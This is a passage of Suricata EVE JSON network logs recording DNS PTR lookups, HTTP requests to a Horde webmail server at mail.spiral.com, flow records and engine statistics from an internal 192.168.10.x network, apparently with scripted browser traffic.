"rst":1197,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1764,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2262,"failed_udp":110},"tx":{"http":4560,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2340}},"flow_mgr":{"closed_pruned":2702,"new_pruned":15,"est_pruned":2313,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19842,"memcap_state":0,"memcap_global":0},"http":{"memuse":37501,"memcap":0}}} 
{"timestamp":"2020-02-29T00:08:20.380494+0000","flow_id":957166403243598,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34478,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58896,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:20.488895+0000","flow_id":957166403243598,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34478,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:20.488895+0000","flow_id":957166403243598,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34478,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:20.578523+0000","flow_id":533480764378464,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364}} {"timestamp":"2020-02-29T00:08:20.578523+0000","flow_id":533480764378464,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} {"timestamp":"2020-02-29T00:08:21.001904+0000","flow_id":97464254789635,"event_type":"flow","src_ip":"192.168.10.122","src_port":35466,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:20.456707+0000","end":"2020-02-29T00:03:20.562100+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:25.000275+0000","event_type":"stats","stats":{"uptime":14157,"capture":{"kernel_packets":134030,"kernel_drops":0},"decoder":{"pkts":134037,"bytes":92638832,"invalid":183,"ipv4":132572,"ipv6":8,"ethernet":134037,"raw":0,"null":0,"sll":0,"tcp":127414,"udp":4960,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2723,"ssn_memcap_drop":0,"pseudo":342,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2739,"synack":2730,"rst":1197,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1765,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":
0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2263,"failed_udp":110},"tx":{"http":4561,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2341}},"flow_mgr":{"closed_pruned":2703,"new_pruned":15,"est_pruned":2314,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19841,"memcap_state":0,"memcap_global":0},"http":{"memuse":76699,"memcap":0}}} {"timestamp":"2020-02-29T00:08:25.579747+0000","flow_id":533480764378464,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52706,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":592,"tx_id":0}} {"timestamp":"2020-02-29T00:08:26.000572+0000","flow_id":1214181537235511,"event_type":"flow","src_ip":"192.168.10.81","src_port":52696,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":9,"bytes_toserver":1227,"bytes_toclient":6723,"start":"2020-02-29T00:07:20.213559+0000","end":"2020-02-29T00:07:25.402051+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:08:26.322012+0000","flow_id":427648475654620,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47740,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35129,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:26.430911+0000","flow_id":427648475654620,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47740,"proto":"UDP","dns":{"type":"answer","id":35129,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:26.430911+0000","flow_id":427648475654620,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47740,"proto":"UDP","dns":{"type":"answer","id":35129,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:26.514026+0000","flow_id":1506149123404467,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8618}} {"timestamp":"2020-02-29T00:08:26.884224+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49361,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":65193,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:08:26.992939+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65193,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:26.992939+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65193,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:27.011353+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49361,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":65194,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:08:27.119823+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65194,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:27.119823+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65194,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:31.518716+0000","flow_id":1506149123404467,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34768,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8618},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":34775,"tx_id":0}} {"timestamp":"2020-02-29T00:08:32.000293+0000","event_type":"stats","stats":{"uptime":14164,"capture":{"kernel_packets":134072,"kernel_drops":0},"decoder":{"pkts":134077,"bytes":92653227,"invalid":184,"ipv4":132612,"ipv6":8,"ethernet":134077,"raw":0,"null":0,"sll":0,"tcp":127447,"udp":4966,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2725,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2741,"synack":2732,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1766,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2265,"failed_udp":110},"tx":{"http":4562,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2344}},"flow_mgr":{"closed_pruned":2704,"new_pruned":15,"est_pruned":2314,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":71338,"memc
ap":0}}} {"timestamp":"2020-02-29T00:08:33.000196+0000","flow_id":282835044059291,"event_type":"flow","src_ip":"192.168.10.122","src_port":46479,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:32.247963+0000","end":"2020-02-29T00:03:32.359559+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:38.305553+0000","flow_id":1562984426416529,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18336,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:38.414838+0000","flow_id":1562984426416529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38137,"proto":"UDP","dns":{"type":"answer","id":18336,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:38.414838+0000","flow_id":1562984426416529,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38137,"proto":"UDP","dns":{"type":"answer","id":18336,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:38.458150+0000","flow_id":1380207798145143,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:08:38.458150+0000","flow_id":1380207798145143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":12,"tx_id":0}} 
{"timestamp":"2020-02-29T00:08:39.000204+0000","event_type":"stats","stats":{"uptime":14171,"capture":{"kernel_packets":134077,"kernel_drops":0},"decoder":{"pkts":134081,"bytes":92653443,"invalid":184,"ipv4":132614,"ipv6":8,"ethernet":134081,"raw":0,"null":0,"sll":0,"tcp":127449,"udp":4966,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2725,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2741,"synack":2732,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1766,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2265,"failed_udp":110},"tx":{"http":4562,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2344}},"flow_mgr":{"closed_pruned":2704,"new_pruned":15,"est_pruned":2315,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":41799,"memcap":0}}} 
{"timestamp":"2020-02-29T00:08:40.000530+0000","flow_id":1337983970224512,"event_type":"flow","src_ip":"192.168.10.81","src_port":52698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":12,"bytes_toserver":2799,"bytes_toclient":7443,"start":"2020-02-29T00:07:30.108928+0000","end":"2020-02-29T00:07:39.863656+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:43.465641+0000","flow_id":1380207798145143,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34772,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} 
{"timestamp":"2020-02-29T00:08:44.000493+0000","flow_id":322507671114127,"event_type":"flow","src_ip":"192.168.10.130","src_port":34756,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":24,"bytes_toserver":2313,"bytes_toclient":23216,"start":"2020-02-29T00:07:08.037263+0000","end":"2020-02-29T00:07:43.801338+0000","age":35,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:46.000206+0000","event_type":"stats","stats":{"uptime":14178,"capture":{"kernel_packets":134091,"kernel_drops":0},"decoder":{"pkts":134094,"bytes":92655563,"invalid":184,"ipv4":132627,"ipv6":8,"ethernet":134094,"raw":0,"null":0,"sll":0,"tcp":127460,"udp":4968,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2726,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2742,"synack":2733,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1767,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2266,"failed_udp":110},"tx":{"http":4563,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2345}},"flow_mgr":{"closed_pruned":2705,"new_pruned":15,"est_pruned":2315,"by
passed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":23423,"memcap":0}}} {"timestamp":"2020-02-29T00:08:48.000762+0000","flow_id":106092845825221,"event_type":"flow","src_ip":"192.168.10.122","src_port":45285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:47.425157+0000","end":"2020-02-29T00:03:47.531143+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:48.001048+0000","flow_id":1247342965809315,"event_type":"flow","src_ip":"192.168.10.122","src_port":48919,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:03:47.581795+0000","end":"2020-02-29T00:03:47.693010+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:08:53.000221+0000","event_type":"stats","stats":{"uptime":14185,"capture":{"kernel_packets":134091,"kernel_drops":0},"decoder":{"pkts":134094,"bytes":92655563,"invalid":184,"ipv4":132627,"ipv6":8,"ethernet":134094,"raw":0,"null":0,"sll":0,"tcp":127460,"udp":4968,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":690,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2726,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2742,"synack":2733,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1767,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2266,"failed_udp":110},"tx":{"http":4563,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2345}},"flow_mgr":{"closed_pruned":2706,"new_pruned":15,"est_pruned":2317,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19842,"memcap_state":0,"memcap_global":0},"http":{"memuse":23423,"memcap":0}}} 
{"timestamp":"2020-02-29T00:08:55.311909+0000","flow_id":886797661356645,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51170,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17907,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:55.421067+0000","flow_id":886797661356645,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51170,"proto":"UDP","dns":{"type":"answer","id":17907,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:55.421067+0000","flow_id":886797661356645,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51170,"proto":"UDP","dns":{"type":"answer","id":17907,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:55.580883+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7875}} 
{"timestamp":"2020-02-29T00:08:58.000694+0000","flow_id":642560046543245,"event_type":"flow","src_ip":"192.168.10.130","src_port":34762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":20,"bytes_toserver":3083,"bytes_toclient":18004,"start":"2020-02-29T00:07:46.405901+0000","end":"2020-02-29T00:07:57.100953+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:59.842681+0000","flow_id":473067756685678,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52708,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7875},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":43765,"tx_id":0}} {"timestamp":"2020-02-29T00:08:59.853060+0000","flow_id":795898973717572,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44755,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19807,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:59.961986+0000","flow_id":795898973717572,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44755,"proto":"UDP","dns":{"type":"answer","id":19807,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
